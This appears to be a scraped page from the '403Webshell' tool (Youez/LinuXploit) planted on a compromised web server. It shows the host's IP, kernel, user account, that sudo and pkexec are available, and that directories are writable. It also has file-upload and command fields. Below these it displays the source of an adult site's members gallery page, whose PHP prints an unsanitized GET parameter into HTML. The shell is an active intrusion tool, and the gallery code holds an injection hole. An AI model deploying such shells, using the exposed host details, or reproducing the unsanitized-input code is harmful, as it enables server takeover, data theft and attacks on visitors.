403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.185
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/handjobcafe.com/public_html/members/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/handjobcafe.com/public_html/members/bonus-photos.html
<!DOCTYPE html>
<html class="no-js">
    <head>
        <meta charset="utf-8">
        <title>photos</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width">
        <link rel="stylesheet" href="./css/style.css">
		<link rel="stylesheet" type="text/css" href="/./js/shadowbox-3.0.3/shadowbox.css">
		<script type="text/javascript" src="/./js/shadowbox-3.0.3/shadowbox.js"></script>
		<script type="text/javascript">
			Shadowbox.init();
		</script>
    </head>
	
    <body id="photos">
		<div id="container">
			<header></header>
			<?php include("nav.php"); ?>
			<div id="main">
				<?php
				if($_GET[pic])
				{ ?>
					<div>
						<p><a href="/members/bonus-photos.html" style="color:#666;font-weight:bold;">Go Back</a>
					</div>
					<div class="single" style="text-align:center;">
						<img src="photos/<?php print $_GET[pic]; ?>" style="width:97%; margin:0 auto;" />
					</div>
					<div class="thumbs" style="clear:both;margin:20px auto;">
				<?php }
						else
						{
							if ($handle = opendir('photos'))
							{
								while (false !== ($entry = readdir($handle)))
								{
									if ($entry != "." && $entry != ".." && strstr($entry, "thm"))
									{
										$name = str_replace("-thm", "", $entry);
										$name = str_replace(".jpg", "", $name); ?>
										<div class="thumb" style="float:left; width:25%;text-align:center;">
											<a href="/members/bonus-photos.html?pic=<?php print str_replace("-thm", "", $entry); ?>"><img src="photos/<?php print $entry; ?>" style="width:97%; margin:0 auto;" alt="" /></a>
										</div>
									<?php }
								}
								closedir($handle);
							}
						} ?>
					</div>
			</div>
			<footer>
				<div class="bottomadd"></div>
			</footer>
		</div>
	</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit